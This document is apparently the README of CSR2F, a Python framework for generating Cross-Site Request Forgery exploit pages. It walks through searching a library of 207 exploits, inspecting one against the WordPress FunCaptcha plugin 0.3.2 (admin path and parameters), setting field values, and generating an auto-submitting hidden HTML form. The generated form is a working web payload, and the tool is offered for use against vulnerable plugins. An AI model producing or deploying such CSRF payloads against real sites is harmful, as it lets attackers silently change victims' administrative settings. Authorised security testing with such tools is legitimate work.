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CSR2F is a Python tool used for generating CSRF (Cross-Site Request Forgery) exploits

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CSR2F (Cross-Site Request Forgery Framework) is an open source tool written in Python and used for generating CSRF (Cross-Site Request Forgery) exploits. It allows you to search an exploit for a specific case (for example a vulnerable WordPress plugin), then to configure and generate the HTML code.



You can download the latest tarball by clicking here or latest zipball by clicking here.

Preferably, you can download CSR2F by cloning the Git repository:

git clone


You must execute the file to start CSR2F and obtain a prompt:

shatter@shatter:~/csr2f$ python3

*                                                       *
*     ______   ______   _______      _____   ________   *
*   .' ___  |.' ____ \ |_   __ \    / ___ `.|_   __  |  *
*  / .'   \_|| (___ \_|  | |__) |  |_/___) |  | |_ \_|  *
*  | |        _.____`.   |  __ /    .'____.'  |  _|     *
*  \ `.___.'\| \____) | _| |  \ \_ / /_____  _| |_      *
*   `.____ .' \______.'|____| |___||_______||_____|     *
*                                                       *
*         Cross Site Request Forgery Framework          *
*                                                       *
* Version  : 0.1b                                       *
* Author   : Nicolas Crocfer                            *
* Website  :                    *
* Licence  : GPLv3                                      *
*                                                       *

[+] 207 exploits loaded



This command describes the other commands and shows their usage.

csr2f> help

Commands    Description
========    ===========

config      Display the configuration options
clear       Clear the current screen
search      Search an exploit based on keyword
show        Display informations about an exploit based on its ID
set         Set special fields for an exploit
generate    Generate the exploit to the console or in a file
...         ...

csr2f> help config

This command is used to view and modify the basic configuration. You
can view it by typing 'config' without argument.

Usage:  config <item> <value>
Ex: config host_url



This command is used to view and modify the basic configuration.

csr2f> config

    Config          Value
    ======          =====

    redirect        False
    html_skeleton   True
    html_title      CSR2F : Cross Site Request Forgery Framework

csr2f> config redirect True
[+] The value has been modified


You can search an exploit based on keywords by using the search command.

csr2f> search wordpress plugin

ID      Method     Name                           Description
==      ======     ====                           ===========

112     POST       Wordpress FunCaptcha plug...   A CSRF vulnerability allows to disable...
134     POST       Wordpress Mathjax Latex P...   There is no CSRF protection on the mat...
175     POST       WordPress SolveMedia 1.1.0     SolveMedia is a capatcha service that ...
...     ...        ...                            ...



This command is used to show the informations about an exploit (author, description, configuration...).

csr2f> show 112


    Name : Wordpress FunCaptcha plugin 0.3.2

    A CSRF vulnerability allows to disable the plugin by submitting an invalid private or public key.

    Author : Nicolas Crocfer (

    Method & Path : (POST) /wp-admin/plugins.php?page=funcaptcha/wp_funcaptcha.php


    funcaptcha[public_key] => foo
    Value of the new public key

    funcaptcha[private_key] => bar
    Value of the new private key



Each exploit can contain special fields that you can edit (for example a username, a password, an email adress...). This command is used to change these values.

csr2f> set 112 funcaptcha[public_key] 1234
[+] The value has been modified


This command is used to generate the HTML exploit. You can display it on the screen by typing generate <id> without other argument. You can also pass a filename to create a new file.

csr2f> generate 112

<!DOCTYPE html>
      <meta charset="utf-8"/>
          CSR2F : Cross Site Request Forgery Framework
    <form action="" id="csr2f" method="post">
      <input name="funcaptcha[public_key]" type="hidden" value="foo"/>
      <input name="funcaptcha[private_key]" type="hidden" value="bar"/>
      <input name="funcaptcha[action]" type="hidden" value="settings"/>
      <input name="funcaptcha[type]" type="hidden" value="Settings"/>
    <script type="text/javascript">

csrf2> generate 112 index.html
[+] The file was created in 'output' folder

Other commands

Creating a new exploit

For the time being, CSR2F does not include a lot of exploits. I am currently incorporating the ones already online on

But the goal of this framework is to be the reference for CSRF vulnerabilities : so I encourage you to integrate your exploit to this tool when you discover a new vulnerability, and thereby increase the list with your contributions.

CSR2F uses a simple template for integrating new exploits. Each exploit is located in the exploits folder. For the moment this tool is still in Beta version, so I am waiting the return of beta testers to see if I need to add or modify the template system and then update this documentation. Anyway you can view the existing templates and tell me what do you think about.

Oh, one last thing

I'm a French developer, my English is not perfect and I thank you in advance to tell me my mistakes :)